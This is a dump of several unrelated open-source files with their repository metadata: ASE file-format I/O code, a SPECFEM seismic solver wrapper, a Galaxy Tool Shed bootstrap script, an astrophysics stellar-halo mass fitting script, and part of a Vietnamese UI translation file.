ase.io.etsf import ETSFReader return ETSFReader(filename).read_atoms() raise RuntimeError('File format descriptor '+format+' not recognized!') def write(filename, images, format=None, **kwargs): """Write Atoms object(s) to file. filename: str Name of the file to write to. images: Atoms object or list of Atoms objects A single Atoms object or a list of Atoms objects. format: str Used to specify the file-format. If not given, the file-format will be taken from suffix of the filename. The accepted output formats: ========================= =========== format short name ========================= =========== ASE pickle trajectory traj ASE bundle trajectory bundle CUBE file cube XYZ-file xyz VASP POSCAR/CONTCAR file vasp Protein Data Bank pdb CIF-file cif XCrySDen Structure File xsf FHI-aims geometry file aims gOpenMol .plt file plt Python script py Encapsulated Postscript eps Portable Network Graphics png Persistance of Vision pov VTK XML Image Data vti VTK XML Structured Grid vts VTK XML Unstructured Grid vtu TURBOMOLE coord file tmol exciting exi AtomEye configuration cfg WIEN2k structure file struct DftbPlus input file dftb ETSF etsf.nc ========================= =========== The use of additional keywords is format specific. The ``cube`` and ``plt`` formats accept (plt requires it) a ``data`` keyword, which can be used to write a 3D array to the file along with the nuclei coordinates. The ``vti``, ``vts`` and ``vtu`` formats are all specifically directed for use with MayaVi, and the latter is designated for visualization of the atoms whereas the two others are intended for volume data. Further, it should be noted that the ``vti`` format is intended for orthogonal unit cells as only the grid-spacing is stored, whereas the ``vts`` format additionally stores the coordinates of each grid point, thus making it useful for volume date in more general unit cells. The ``eps``, ``png``, and ``pov`` formats are all graphics formats, and accept the additional keywords: rotation: str (default '') The rotation angles, e.g. '45x,70y,90z'. show_unit_cell: int (default 0) Can be 0, 1, 2 to either not show, show, or show all of the unit cell. radii: array or float (default 1.0) An array of same length as the list of atoms indicating the sphere radii. A single float specifies a uniform scaling of the default covalent radii. bbox: 4 floats (default None) Set the bounding box to (xll, yll, xur, yur) (lower left, upper right). colors: array (default None) An array of same length as the list of atoms, indicating the rgb color code for each atom. Default is the jmol_colors of ase/data/colors. scale: int (default 20) Number of pixels per Angstrom. For the ``pov`` graphics format, ``scale`` should not be specified. The elements of the color array can additionally be strings, or 4 and 5 vectors for named colors, rgb + filter, and rgb + filter + transmit specification. This format accepts the additional keywords: ``run_povray``, ``display``, ``pause``, ``transparent``, ``canvas_width``, ``canvas_height``, ``camera_dist``, ``image_plane``, ``camera_type``, ``point_lights``, ``area_light``, ``background``, ``textures``, ``celllinewidth``, ``bondlinewidth``, ``bondatoms`` """ if format is None: if filename == '-': format = 'xyz' filename = sys.stdout elif 'POSCAR' in filename or 'CONTCAR' in filename: format = 'vasp' elif 'OUTCAR' in filename: format = 'vasp_out' elif filename.endswith('etsf.nc'): format = 'etsf' else: suffix = filename.split('.')[-1] format = {}.get(suffix, suffix) # XXX this does not make sense # Maybe like this: ## format = {'traj': 'trajectory', ## 'nc': 'netcdf', ## 'exi': 'exciting', ## 'in': 'aims', ## 'tmol': 'turbomole', ## }.get(suffix, suffix) if format == 'exi': from ase.io.exciting import write_exciting write_exciting(filename, images) return if format == 'cif': from ase.io.cif import write_cif write_cif(filename, images) if format == 'xyz': from ase.io.xyz import write_xyz write_xyz(filename, images) return elif format == 'in': format = 'aims' elif format == 'tmol': from ase.io.turbomole import write_turbomole write_turbomole(filename, images) return elif format == 'dftb': from ase.io.dftb import write_dftb write_dftb(filename, images) return elif format == 'struct': from ase.io.wien2k import write_struct write_struct(filename, images, **kwargs) return elif format == 'findsym': from ase.io.findsym import write_findsym write_findsym(filename, images) return elif format == 'etsf': from ase.io.etsf import ETSFWriter writer = ETSFWriter(filename) if not isinstance(images, (list, tuple)): images = [images] writer.write_atoms(images[0]) writer.close() return format = {'traj': 'trajectory', 'nc': 'netcdf', 'bundle': 'bundletrajectory' }.get(format, format) name = 'write_' + format if format in ['vti', 'vts', 'vtu']: format = 'vtkxml' if format is None: format = filetype(filename) try: write = getattr(__import__('ase.io.%s' % format, {}, {}, [name]), name) except ImportError: raise TypeError('Unknown format: "%s".' % format) write(filename, images, **kwargs) def string2index(string): if ':' not in string: return int(string) i = [] for s in string.split(':'): if s == '': i.append(None) else: i.append(int(s)) i += (3 - len(i)) * [None] return slice(*i) def filetype(filename): """Try to guess the type of the file.""" if os.path.isdir(filename): # Potentially a BundleTrajectory if BundleTrajectory.is_bundle(filename): return 'bundle' else: raise IOError('Directory: ' + filename) fileobj = open(filename) s3 = fileobj.read(3) if len(s3) == 0: raise IOError('Empty file: ' + filename) if is_tarfile(filename): return 'gpw' if s3 == 'CDF': from ase.io.pupynere import NetCDFFile nc = NetCDFFile(filename) if 'number_of_dynamic_atoms' in nc.dimensions: return 'dacapo' history = nc.history if history == 'GPAW restart file': return 'gpw-nc' if history == 'ASE trajectory': return 'nc' if history == 'Dacapo': return 'dacapo' if hasattr(nc, 'file_format') and nc.file_format.startswith('ETSF'): return 'etsf' raise IOError('Unknown netCDF file!') if is_zipfile(filename): return 'vnl' fileobj.seek(0) lines = fileobj.readlines(1000) if lines[0].startswith('PickleTrajectory'): return 'traj' if lines[1].startswith('OUTER LOOP:') or filename.lower().endswith('.cube'): return 'cube' if ' ___ ___ ___ _ _ _ \n' in lines: return 'gpaw-text' if (' &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&\n' in lines[:90]): return 'dacapo-text' for line in lines: if line[0] != '#': word = line.strip() if word in ['ANIMSTEPS', 'CRYSTAL', 'SLAB', 'POLYMER', 'MOLECULE']: return 'xsf' filename_v = basename(filename) if 'POSCAR' in filename_v or 'CONTCAR' in filename_v: return 'vasp' if 'OUTCAR' in filename_v: return 'vasp_out' if filename.lower().endswith('.exi'): return 'exi' if filename.lower().endswith('.mol'): return 'mol' if filename.lower().endswith('.pdb'): return 'pdb' if filename.lower().endswith('.cif'): return 'cif' if filename.lower().endswith('.struct'): return 'struct' if filename.lower().endswith('.in'): return 'aims' if filename.lower().endswith('.out'): return 'aims_out' if filename.lower().endswith('.cfg'): return 'cfg' if os.path.split(filename)[1] == 'atoms.dat': return 'iwm' if filename.endswith('I_info'): return 'Cmdft' if lines[0].startswith('$coord'): return 'tmol' if lines[0].startswith('Geometry'): return 'dftb' if s3 == '<?x': from ase.io.vtkxml import probe_vtkxml xmltype = probe_vtkxml(filename) if xmltype == 'ImageData': return 'vti' elif xmltype == 'StructuredGrid': return 'vts' elif xmltype == 'UnstructuredGrid': return 'vtu' elif xmltype is not None: raise IOError('Unknown VTK XML file!') if filename.lower().endswith('.sdf'): return 'sdf' return 'xyz'
slabanja/ase
ase/io/__init__.py
Python
gpl-2.0
15,788
[ "ASE", "CRYSTAL", "FHI-aims", "GPAW", "Mayavi", "NetCDF", "TURBOMOLE", "VASP", "VTK", "WIEN2k", "exciting" ]
5e49e86cfcab7defe4b108ac8f4254b00e61601c71096e04593055937208b670
from verce.processing import * import socket import traceback import os import json class specfemGlobeRunSolverMov(SeismoPreprocessingActivity): def compute(self): stdoutdata = None stderrdata = None if self.parameters["mpi_invoke"] == 'mpiexec.hydra' or self.parameters["mpi_invoke"] == 'mpirun': stdoutdata, stderrdata = commandChain([["{};{};{}".format( self.parameters["mpi_invoke"] + ' -np ' + str(self.parameters["NPROC"]) + " ./bin/xspecfem3D", "mkdir -p OUTPUT_FILES/waveform", "mv OUTPUT_FILES/*.ascii OUTPUT_FILES/waveform" )]], os.environ.copy()) else: stdoutdata, stderrdata = commandChain([["{};{};{}".format( self.parameters["mpi_invoke"] + " ./bin/xspecfem3D", "mkdir -p OUTPUT_FILES/waveform", "mv OUTPUT_FILES/*.ascii OUTPUT_FILES/waveform" )]], os.environ.copy()) self.addOutput(os.getcwd() + "/OUTPUT_FILES/waveform/", metadata={'prov:type': 'synthetic-waveform'}, location="file://" + socket.gethostname() + "/" + os.getcwd() + "/OUTPUT_FILES/waveform/", format="text/plain") self.addOutput(os.getcwd() + "/OUTPUT_FILES/output_solver.txt", location="file://" + socket.gethostname() + "/" + os.getcwd() + "/OUTPUT_FILES/output_solver.txt", format="text/plain", control={"con:immediateAccess": "true"}, metadata={'file': 'output_solver.txt'}) self.error += str(stderrdata) try: if self.parameters["SAVE_MESH_FILES"] == "true" or self.parameters["SAVE_MESH_FILES"] == "True" or \ self.parameters["SAVE_MESH_FILES"] == True: print "Packing mesh vtks" self.launchParallelCommandsChain([[["{};{}".format( "tar czf OUTPUT_FILES/velocity-vtks.tar.gz OUTPUT_FILES/DATABASES_MPI/*.vtk", "rm -rf OUTPUT_FILES/DATABASES_MPI/*.vtk" )]], os.environ.copy()]) self.addOutput(os.getcwd() + "/OUTPUT_FILES/velocity-vtks.tar.gz", location="file://" + socket.gethostname() + "/" + os.getcwd() + "/OUTPUT_FILES/velocity-vtks.tar.gz", format="application/octet-stream") if self.parameters["MOVIE_SURFACE"] == "true" or self.parameters["MOVIE_SURFACE"] == "True" or \ self.parameters["MOVIE_SURFACE"] == True: print "Producing movie files and video" # generate gmt ascii files from moviedata then produce the movie file noOfFiles=len({name.split(".")[0] for name in os.listdir("OUTPUT_FILES") if "moviedata00" in name}) first_time_step=self.parameters["NTSTEP_BETWEEN_FRAMES"] last_time_step=int(first_time_step) * noOfFiles self.create_gmt_ascii_files(first_time_step, str(last_time_step)) if self.parameters["mpi_invoke"] == 'mpiexec.hydra' or self.parameters["mpi_invoke"] == 'mpirun': self.launchParallelCommandsChain([[["{};{}".format( self.parameters["mpi_invoke"] + " " + self.parameters["mpi_par_mov"] + " python $RUN_PATH/verce-hpc-pe/src/mpi/create_movie_snapshot_tuned_globe.py --filespath=OUTPUT_FILES --videoname=" + self.runId + ".mp4 --lat=" + str(self.parameters["CENTER_LATITUDE_IN_DEGREES"]) + " --lon=" + str(self.parameters["CENTER_LONGITUDE_IN_DEGREES"]) + " --eta=" + str(self.parameters["ANGULAR_WIDTH_ETA_IN_DEGREES"]) + " --xi=" + str(self.parameters["ANGULAR_WIDTH_XI_IN_DEGREES"]) + " --mesh=" +str(self.parameters["mesh"]), "cp " + str(self.runId) + ".mp4 " + "OUTPUT_FILES/")]], os.environ.copy()]) ' pre joins working processes until all chains are terminated ' self.joinChains() ' compress image files and do cleanups ' self.launchParallelCommandsChain([[["{};{};{};{}".format( "tar czf OUTPUT_FILES/movie-files.tar.gz OUTPUT_FILES/moviedata*", "tar czf OUTPUT_FILES/time-files.tar.gz OUTPUT_FILES/timestamp*", "tar czf OUTPUT_FILES/gmt-files.tar.gz OUTPUT_FILES/gmt_movie*.xyz", "tar czf OUTPUT_FILES/plt-moviedata.tar.gz OUTPUT_FILES/gmt_movie*.png")]], os.environ.copy()]) self.joinChains() self.launchParallelCommandsChain([[["{};{};{}".format( "rm -rf OUTPUT_FILES/moviedata*", "rm -rf OUTPUT_FILES/timestamp*", "rm -rf OUTPUT_FILES/gmt_movie*" )]], os.environ.copy()]) self.addOutput(os.getcwd() + "/OUTPUT_FILES/movie-files.tar.gz", location="file://" + socket.gethostname() + "/" + os.getcwd() + "/OUTPUT_FILES/movie-files.tar.gz", format="application/octet-stream") self.addOutput(os.getcwd() + "/OUTPUT_FILES/time-files.tar.gz", location="file://" + socket.gethostname() + "/" + os.getcwd() + "/OUTPUT_FILES/time-files.tar.gz", format="application/octet-stream", control={"con:immediateAccess": "true"}) self.addOutput(os.getcwd() + "/OUTPUT_FILES/ascii-moviedata.tar.gz", location="file://" + socket.gethostname() + "/" + os.getcwd() + "/OUTPUT_FILES/ascii-moviedata.tar.gz", format="application/octet-stream", control={"con:immediateAccess": "true"}) self.addOutput(os.getcwd() + "/OUTPUT_FILES/plt-moviedata.tar.gz", location="file://" + socket.gethostname() + "/" + os.getcwd() + "/OUTPUT_FILES/plt-moviedata.tar.gz", format="image/png") if os.path.isfile(os.getcwd() + "/OUTPUT_FILES/" + self.runId + ".mp4"): self.addOutput(os.getcwd() + "/OUTPUT_FILES/" + self.runId + ".mp4", location="file://" + socket.gethostname() + "/" + os.getcwd() + "/OUTPUT_FILES/" + self.runId + ".mp4", format="video/mpeg") except Exception, err: traceback.print_exc(file=sys.stderr) def create_gmt_ascii_files(self, first_time_step, last_time_step): # this is a default option value for creating files in GMT xyz ascii long/lat/U format gmt_ascii_input_value = '4' # 1=Z, 2= N and 3=E components = ['1', '2', '3'] commands=[] for component in components: cmd = "echo \" %s \n %s \n %s \n %s \" | ./bin/xcreate_movie_AVS_DX " % (gmt_ascii_input_value, first_time_step, last_time_step, component) commands.append(cmd) print cmd stdoutdata, stderrdata = commandChain(commands, os.environ.copy()) self.error += str(stderrdata) if __name__ == "__main__": proc = specfemGlobeRunSolverMov("specfemGlobeRunSolverMov") proc.process();
KNMI/VERCE
verce-hpc-pe/src/specfemGlobeRunSolverMov.py
Python
mit
7,287
[ "VTK" ]
576c1a6b60114328496dcd99a8a07af731f46565cebec1c648f6f8d795e846a8
#!/usr/bin/python import argparse import ConfigParser import os import sys new_path = [ os.path.join( os.getcwd(), "lib" ) ] new_path.extend( sys.path[1:] ) sys.path = new_path from galaxy import eggs eggs.require( "SQLAlchemy >= 0.4" ) import galaxy.webapps.tool_shed.model.mapping as tool_shed_model from sqlalchemy.exc import ProgrammingError from sqlalchemy.exc import OperationalError from tool_shed.util import xml_util def check_db( config_parser ): dburi = None if config_parser.has_option( 'app:main', 'database_connection' ): dburi = config_parser.get( 'app:main', 'database_connection' ) elif config_parser.has_option( 'app:main', 'database_file' ): db_file = config_parser.get( 'app:main', 'database_file' ) dburi = "sqlite:///%s?isolation_level=IMMEDIATE" % db_file else: print 'The database configuration setting is missing from the tool_shed.ini file. Add this setting before attempting to bootstrap.' exit(1) sa_session = None database_exists_message = 'The database configured for this Tool Shed is not new, so bootstrapping is not allowed. ' database_exists_message += 'Create a new database that has not been migrated before attempting to bootstrap.' try: model = tool_shed_model.init( config_parser.get( 'app:main', 'file_path' ), dburi, engine_options={}, create_tables=False ) sa_session = model.context.current print database_exists_message exit(1) except ProgrammingError, e: pass except OperationalError, e: pass try: if sa_session is not None: result = sa_session.execute( 'SELECT version FROM migrate_version' ).first() if result[0] >= 2: print database_exists_message exit(1) else: pass except ProgrammingError, e: pass if config_parser.has_option( 'app:main', 'hgweb_config_dir' ): hgweb_config_parser = ConfigParser.ConfigParser() hgweb_dir = config_parser.get( 'app:main', 'hgweb_config_dir' ) hgweb_config_file = os.path.join( hgweb_dir, 'hgweb.config' ) if not os.path.exists( hgweb_config_file ): exit(0) hgweb_config_parser.read( hgweb_config_file ) configured_repos = hgweb_config_parser.items( 'paths' ) if len( configured_repos ) >= 1: message = "This Tool Shed's hgweb.config file contains entries, so bootstrapping is not allowed. Delete" message += " the current hgweb.config file along with all associated repositories in the configured " message += "location before attempting to boostrap." print exit(1) else: exit(0) else: exit(0) exit(0) def admin_user_info( config_parser ): user_info_config = os.path.abspath( os.path.join( os.getcwd(), 'lib/tool_shed/scripts/bootstrap_tool_shed', 'user_info.xml' ) ) tree, error_message = xml_util.parse_xml( user_info_config ) if tree is None: print "The XML file ", user_info_config, " seems to be invalid, using defaults." email = 'admin@test.org' password = 'testuser' username = 'admin' else: root = tree.getroot() for elem in root: if elem.tag == 'email': email = elem.text elif elem.tag == 'password': password = elem.text elif elem.tag == 'username': username = elem.text print '%s__SEP__%s__SEP__%s' % ( username, email, password ) return 0 def get_local_tool_shed_url( config_parser ): port = '9009' if config_parser.has_section( 'server:main' ): if config_parser.has_option( 'server:main', 'port' ): port = config_parser.get( 'server:main', 'port' ) host = '127.0.0.1' print 'http://%s:%s' % ( host, port ) return 0 def main( args ): config_parser = ConfigParser.ConfigParser() if os.path.exists( args.config ): config_parser.read( args.config ) else: return 1 if args.method == 'check_db': return check_db( config_parser ) elif args.method == 'admin_user_info': return admin_user_info( config_parser ) elif args.method == 'get_url': return get_local_tool_shed_url( config_parser ) else: return 1 parser = argparse.ArgumentParser() parser.add_argument( '-c', '--config_file', dest='config', action='store', default='config/tool_shed.ini.sample' ) parser.add_argument( '-e', '--execute', dest='method', action='store', default='check_db' ) args = parser.parse_args() if __name__ == '__main__': exit( main( args ) )
mikel-egana-aranguren/SADI-Galaxy-Docker
galaxy-dist/lib/tool_shed/scripts/bootstrap_tool_shed/bootstrap_util.py
Python
gpl-3.0
4,745
[ "Galaxy" ]
f6f1071aefb9d18f37722285ce10df369adb84dfa21078f78b158c73a4f226f2
#!/usr/bin/env python3 # -*-coding:Utf-8 -* """Use MCMC to find the stellar mass halo mass relation. Based on the Behroozi et al 2010 paper. Use a parametrization of the SHMR, plus a given HMF to find the expected SMF and compare it to the observed SMF with its uncertainties using a likelihod maximisation. Started on december 18th by Louis Legrand at IAP and IAS. """ import numpy as np # import matplotlib.pyplot as plt # import emcee from astropy.cosmology import LambdaCDM import scipy.optimize as op from scipy import signal import os cwd = os.getcwd() ################# ### Load data ### ################# """Load HMF""" # redshifts of the BolshoiPlanck files redshift_haloes = np.arange(0, 10, step=0.1) numredshift_haloes = np.size(redshift_haloes) """Definition of hmf_bolshoi columns : hmf_bolshoi[redshift][:,0] = Log10(mass) [Msun] hmf_bolshoi[redshift][:,1] = Log10(cen_mf), ie central haloes mass function (density) [1/Mpc^3] hmf_bolshoi[redshift][:,2] = Log10(all_macc_mf), ie all haloes mass function (density) [1/Mpc^3] """ hmf_bolshoi = [] for i in range(numredshift_haloes): hmf_bolshoi.append( np.loadtxt('../Data/HMFBolshoiPlanck/mf_planck/mf_planck_z' + '{:4.3f}'.format(redshift_haloes[i]) + '_mvir.dat')) """Load the SMF from Iary Davidzon+17""" # redshifts of the Iari SMF redshifts = np.array([0.2, 0.5, 0.8, 1.1, 1.5, 2, 2.5, 3, 3.5, 4.5, 5.5]) numzbin = np.size(redshifts) - 1 smf_cosmos = [] for i in range(10): # Select the SMFs to use : tot, pas or act; D17 or SchechterFixedMs smf_cosmos.append( np.loadtxt('../Data/Davidzon/Davidzon+17_SMF_v3.0/mf_mass2b_fl5b_tot_VmaxFit2D' + str(i) + '.dat')) # '../Data/Davidzon/schechter_fixedMs/mf_mass2b_fl5b_tot_VmaxFit2E' # + str(i) + '.dat') """Adapt SMF to match the Bolshoi-Planck Cosmology""" # Bolshoi-Planck cosmo : (flat LCMD) # Om = 0.3089, Ol = 0.6911, Ob = 0.0486, h = 0.6774, s8 = 0.8159, ns = 0.9667 BP_Cosmo = LambdaCDM(H0=67.74, Om0=0.3089, Ode0=0.6911) # Davidzon+17 SMF cosmo : (flat LCDM) # Om = 0.3, Ol = 0.7, h=0.7 D17_Cosmo = LambdaCDM(H0=70, Om0=0.3, Ode0=0.7) for i in range(10): # Correction of the comoving Volume : VmaxD17 = D17_Cosmo.comoving_volume(redshifts[i+1]) - D17_Cosmo.comoving_volume(redshifts[i]) VmaxBP = BP_Cosmo.comoving_volume(redshifts[i+1]) - BP_Cosmo.comoving_volume(redshifts[i]) # VmaxD17 = get_Vmax_mod.main(redshifts[i], redshifts[i+1], cosmo=[70, 0.3, 0.7]) # VmaxBP = get_Vmax_mod.main(redshifts[i], redshifts[i+1], cosmo=[67.74, 0.3089, 0.6911]) # Add the log, equivalent to multiply by VmaxD17/VmaxBP smf_cosmos[i][:, 1] = smf_cosmos[i][:, 1] + np.log10(VmaxD17/VmaxBP) smf_cosmos[i][:, 2] = smf_cosmos[i][:, 2] + np.log10(VmaxD17/VmaxBP) smf_cosmos[i][:, 3] = smf_cosmos[i][:, 3] + np.log10(VmaxD17/VmaxBP) # Correction of the measured stellar mass # Equivalent to multiply by (BP_Cosmo.H0/D17_Cosmo.H0)**-2 smf_cosmos[i][:, 0] = smf_cosmos[i][:, 0] - 2 * np.log10(BP_Cosmo.H0/D17_Cosmo.H0) ####################################### ### Define functions and parameters ### ####################################### def logMh(logMs, M1, Ms0, beta, delta, gamma): # SM-HM relation return np.log10(M1) + beta*np.log10(logMs/Ms0) + ((logMs/Ms0)**delta)/(1 + (logMs/Ms0)**delta) - 0.5 def phi_direct(logMs1, logMs2, idx_z, M1, Ms0, beta, delta, gamma): # SMF obtained from the SM-HM relation and the HMF # log_Mh1 = logMh(logMs1, M1, Ms0, beta, delta, gamma) # log_Mh2 = logMh(logMs2, M1, Ms0, beta, delta, gamma) # index_Mh = np.argmin(np.abs(hmf_bolshoi[idx_z][:, 0] - log_Mh1)) # phidirect = 10**hmf_bolshoi[idx_z][index_Mh, 2] * (log_Mh1 - log_Mh2)/(logMs1 - logMs2) # return phidirect ## Same but with matrixes : log_Mh1 = logMh(logMs1, M1, Ms0, beta, delta, gamma) log_Mh2 = logMh(logMs2, M1, Ms0, beta, delta, gamma) index_Mh = np.argmin(np.abs( np.tile(hmf_bolshoi[idx_z][:, 0], (len(log_Mh1), 1)) - np.transpose(np.tile(log_Mh1, (len(hmf_bolshoi[idx_z][:, 0]), 1))) ), axis=1) phidirect = 10**hmf_bolshoi[idx_z][index_Mh, 2] * (log_Mh1 - log_Mh2)/(logMs1 - logMs2) return phidirect Mmin = 7 Mmax = 16 numpoints = 1000 y = np.linspace(Mmin, Mmax, num=numpoints) def lognorm(y, logMs, ksi): return 1/np.sqrt(2 * np.pi * ksi**2) * np.exp((y-logMs)/(2*ksi**2)) def phi_true(idx_z, logMs, M1, Ms0, beta, delta, gamma, ksi): # SMF with a log-normal scatter in stellar mass for a given halo mass # This is the same as convolving phi_true with a log-normal density probability function # phitrue = 0 # for i in range(numpoints-1): # phitrue += phi_direct( # y[i], y[i+1], idx_z, M1, Ms0, beta, delta, gamma) * lognorm(y[i], logMs, ksi) # phitrue = np.sum( # phi_direct( # y[:-1], y[1:], idx_z, M1, Ms0, beta, delta, gamma) * lognorm(y[:-1], logMs, ksi) # ) # No convolution (no scatter) case : phitrue = phi_direct(y[:-1], y[1:], idx_z, M1, Ms0, beta, delta, gamma) return phitrue # def phi_true(idx_z, logMs, M1, Ms0, beta, delta, gamma, ksi): # y = np.linspace(Mmin, Mmax, num=numpoints) # phidirect = phi_direct(y[1:], y[:-1], idx_z, M1, Ms0, beta, delta, gamma) # lognorm = signal.gaussian(50, std=ksi) # return np.covolve() # def phi_expect(z1, z2, logMs, M1, Ms0, beta, delta, gamma, ksi): # # Take into account that the observed SMF is for a range of redshift # numpoints = 10 # redshifts = np.linspace(z1, z2, num=numpoints) # top = 0 # bot = 0 # for i in range(numpoints - 1): # dVc = BP_Cosmo.comoving_volume(redshifts[i+1]) - BP_Cosmo.comoving_volume(redshifts[i]) # top += phi_true(redshifts[i], logMs, M1, Ms0, beta, delta, gamma, ksi) * dVc # bot += dVc # return top/bot def chi2(idx_z, M1, Ms0, beta, delta, gamma, ksi): # return the chi**2 between the observed and the expected SMF # z1 = redshifts[idx_z] # z2 = redshifts[idx_z + 1] # logMs = smf_cosmos[idx_z][smf_cosmos[idx_z][:, 1] > -1000, 0] # select points where the smf is defined # numpoints = len(logMs) # chi2 = 0 # for i in range(numpoints): # chi2 += (np.log10( # phi_true(idx_z, logMs[i], M1, Ms0, beta, delta, gamma, ksi) / # 10**smf_cosmos[idx_z][i, 1]) / ((smf_cosmos[idx_z][i, 2] + smf_cosmos[idx_z][i, 3])/2))**2 # Same with matrixes chi2 = np.sum( (np.log10( phi_true(idx_z, 0, M1, Ms0, beta, delta, gamma, ksi) / 10**smf_cosmos[idx_z][:, 1]) / ((smf_cosmos[idx_z][:, 2] + smf_cosmos[idx_z][:, 3])/2))**2 ) return chi2 def negloglike(theta, idx_z): # return the likelihood M1, Ms0, beta, delta, gamma, ksi = theta[:] return chi2(idx_z, M1, Ms0, beta, delta, gamma, ksi)/2 ########################################## ### Find maximum likelihood estimation ### ########################################## idx_z = 0 theta0 = np.array([12, 11, 0.5, 0.5, 2.5, 0.15]) bounds = ((10, 14), (8, 13), (0, 2), (0, 3), (0, 5), (0, 1)) # results = op.minimize(negloglike, theta0, args=(idx_z), bounds=bounds) print(negloglike(theta0, idx_z)) # bashop = op.basinhopping(negloglike, theta0, niter=2, minimizer_kwargs={'args':idx_z}) # curv = op.curve_fit(phi_true, smf_cosmos[idx_z][smf_cosmos[idx_z][:, 1] > -1000, 0], 10**smf_cosmos[idx_z][i, 1], p0=theta0, sigma=smf_cosmos[idx_z][, 2] )
Gorbagzog/StageIAP
MCMC_SHMR.py
Python
gpl-3.0
7,470
[ "Gaussian" ]
9ff273a0903f01a5dba0fbdb39cc2bee49c828cdae1d7f4e1188584bdd4a69c0
# -*- coding: utf-8 -*- { "'Cancel' will indicate an asset log entry did not occur": "'Hủy' sẽ chỉ dẫn một lệnh nhập không thực hiện được", "A location that specifies the geographic area for this region. This can be a location from the location hierarchy, or a 'group location', or a location that has a boundary for the area.": "Một địa điểm chứa các đặc tính địa lý cho vùng đó. Đó có thể là một địa điểm theo đơn vị hành chính hay 'địa điểm nhóm' hay một địa điểm có đường ranh giới cho vùng đó.", "A volunteer is defined as active if they've participated in an average of 8 or more hours of Program work or Trainings per month in the last year": 'Tình nguyện viên hoạt động tích cực là những người tham gia trung bình từ 8 tiếng hoặc hơn vào các hoạt động của chương trình hay tập huấn một tháng trong năm trước.', "Acronym of the organization's name, eg. IFRC.": 'Từ viết tắt của tên tổ chức, vd IFRC.', "Add Person's Details": 'Thêm thông tin cá nhân', "Address of an image to use for this Layer in the Legend. This allows use of a controlled static image rather than querying the server automatically for what it provides (which won't work through GeoWebCache anyway).": 'Địa chỉ của hình ảnh sử dụng cho Lớp này nằm trong phần ghi chú. Việc này giúp việc sử dụng hình ảnh ổn định được kiểm soát tránh báo cáo tự động gửi tới máy chủ yêu cầu giải thích về nội dung cung cấp (chức năng này không hoạt động thông qua GeoWebCach).', "Authenticate system's Twitter account": 'Xác thực tài khoản Twitter thuộc hệ thống', "Can't import tweepy": 'Không thể nhập khẩu tweepy', "Cancel' will indicate an asset log entry did not occur": "Hủy' có nghĩa là ghi chép nhật ký tài sản không được lưu", "Caution: doesn't respect the framework rules!": 'Cảnh báo: Không tôn trọng các qui đinh khung chương trình', "Children's Education": 'Giáo dục Trẻ em', "Click 'Start' to synchronize with this repository now:": "Bấm nút 'Bắt đầu' để đồng bộ hóa kho dữ liệu bầy giờ", "Click on questions below to select them, then click 'Display Selected Questions' button to view the selected questions for all Completed Assessment Forms": "Bấm vào các câu hỏi phía dưới để chọn, sau đó bấm nút 'Hiển thị các câu hỏi đã chọn' để xem các câu hỏi đã chọn cho tất cả các mẫu Đánh giá hoàn chỉnh", "Don't Know": 'Không biết', "Edit Person's Details": 'Chỉnh sửa thông tin cá nhân', "Enter a name to search for. You may use % as wildcard. Press 'Search' without input to list all items.": "Nhập tên để tìm kiếm. Bạn có thể sử dụng % như là ký tự đặc biệt. Ấn 'Tìm kiếm' mà không nhập giá trị để liệt kê tất cả mặt hàng", "Error No Job ID's provided": 'Lỗi mã nhận dạng công việc không được cung cấp', "Framework added, awaiting administrator's approval": 'Khung chương trình đã được thêm mới, đang chờ phê duyệt của quản trị viên', "Go to %(url)s, sign up & then register your application. You can put any URL in & you only need to select the 'modify the map' permission.": "Đến trang %(url)s, đăng ký & sau đó đăng ký ứng dụng của bạn. Bạn có thể dùng bất cứ đường dẫn URL & chỉ cần chọn 'chức năng cho phép sửa bản đồ'.", "If selected, then this Asset's Location will be updated whenever the Person's Location is updated.": 'Nếu chọn, thì sau đó vị trí tài sản sẽ được cập nhật ngay khi vị trí của người đó được cập nhật.', "If this configuration is displayed on the GIS config menu, give it a name to use in the menu. The name for a personal map configuration will be set to the user's name.": 'Nếu cấu hình này được thể hiện trên danh mục cấu hình GIS, đặt tên cho cấu hình để sử dụng trên danh mục. Tên cấu hình bản đồ của cá nhân sẽ được gắn với tên người sử dụng.', "If this field is populated then a user who specifies this Organization when signing up will be assigned as a Staff of this Organization unless their domain doesn't match the domain field.": 'Nếu trường này đã nhiều người khi đó người dùng sẽ chi tiết tổ chức lúc đó việc đăng ký sẽ được phân bổ như là Cán bộ của tổ chức trừ phi chức năng đó không phù hợp.', "If you don't see the Cluster in the list, you can add a new one by clicking link 'Create Cluster'.": "Nếu bạn không tìm thấy tên Nhóm trong danh sách, bạn có thể thêm mới bằng cách ấn nút 'Thêm nhóm'", "If you don't see the Organization in the list, you can add a new one by clicking link 'Create Organization'.": "Nếu bạn không tìm thấy tên Tổ chức trong danh sách, bạn có thể thêm mới bằng cách ấn nút 'Thêm tổ chức'", "If you don't see the Sector in the list, you can add a new one by clicking link 'Create Sector'.": "Nếu bạn không tìm thấy Lĩnh vực trong danh sách, bạn có thể thêm mới bằng cách ấn nút 'Thêm lĩnh vực'", "If you don't see the Type in the list, you can add a new one by clicking link 'Create Office Type'.": "Nếu bạn không tìm thấy Loại hình văn phòng trong danh sách, bạn có thể thêm mới bằng cách ấn nút 'Thêm loại hình văn phòng'", "If you don't see the Type in the list, you can add a new one by clicking link 'Create Organization Type'.": "Nếu bạn không tìm thấy tên Loại hình tổ chức trong danh sách, bạn có thể thêm mới bằng cách ấn nút 'Thêm loại hình tổ chức'", "If you don't see the activity in the list, you can add a new one by clicking link 'Create Activity'.": "Nếu bạn không tìm thấy hoạt động trong danh sách, bạn có thể thêm một bằng cách ấn nút 'Thêm hoạt động'", "If you don't see the asset in the list, you can add a new one by clicking link 'Create Asset'.": "Nếu bạn không tìm thấy tài sản trong danh sách, bạn có thể thêm mới bằng cách ấn nút 'Thêm tài sản'", "If you don't see the beneficiary in the list, you can add a new one by clicking link 'Add Beneficiaries'.": "Nếu bạn không tìm thấy tên người hưởng lợi trong danh sách, bạn có thể thêm mới bằng cách ấn nút 'Thêm người hưởng lợi'", "If you don't see the community in the list, you can add a new one by clicking link 'Create Community'.": "Nếu bạn không thấy Cộng đồng trong danh sách, bạn có thể thêm mới bằng cách ấn nút 'Thêm cộng đồng'", "If you don't see the location in the list, you can add a new one by clicking link 'Create Location'.": "Nếu bạn không thấy Địa điểm trong danh sách, bạn có thể thêm mới bằng cách ấn nút 'Thêm địa điểm'", "If you don't see the project in the list, you can add a new one by clicking link 'Create Project'.": 